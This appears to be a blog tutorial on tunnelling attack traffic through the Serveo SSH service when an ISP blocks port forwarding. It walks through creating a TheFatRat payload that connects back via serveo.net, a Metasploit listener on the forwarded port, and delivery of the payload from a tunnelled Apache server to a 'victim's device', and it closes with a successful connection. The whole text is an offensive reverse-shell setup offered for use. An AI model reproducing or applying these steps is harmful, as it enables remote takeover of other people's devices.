Port Forwarding Without Router Access

We all know that we need to set up port forwarding if we want to allow access to our machine or receive connections outside the local network, the problem is some ISPs block port forwarding and some don’t even have a port forwarding feature. The best solution to this is using the Serveo service. Serveo is an SSH server just for remote port forwarding. When a user connects to Serveo, they get a public URL that can be shared so other users can connect to their localhost server.

Let’s run through an example setup..

Creating a Generic TCP Forwarding Tunnel

1. Open Terminal
2. Run this command to create a TCP forwarding tunnel

ssh -R 1500:localhost:1492 serveo.net

1500 -> This is the port of the serveo service
1492 -> This is the port the serveo service will forward to. (So your Listener should listen on 1492 port)

Creating a Payload

I will be using TheFatRat to generate my payload. So the Host and Port will be as following:
Set LHOST IP: serveo.net
Set LPORT: 1500

Creating Listener using Metasploit

The Host and Port will be as following:

Set LHOST IP: 0.0.0.0
Set LPORT: 1492

Delivering the Payload via Our Apache2 Server.

Now, since our ISP does not allow port forwarding, how are we supposed to access our apache2 server via the victims device? Well, Serveo to the rescue here too, we can use the exact same method we used above to forward port 80 to our apache2 server, so the following is basically the same as above with port 80.

1. Run apache2 service

service apache2 start

2. Run the following command to request port forwarding from the server. You may substitute “lordvordex” for whatever sub-domain you’d like to request from Serveo to use when accessing localhost from the victim’s device.

ssh -R lordvordex:80:localhost:80 serveo.net

3. You can now access your localhost from lordvordex.serveo.net from the victims device.

Finally, running our payload:

As you can see, a connection has successfully been made 🙂

Hope this helped you. See ya later.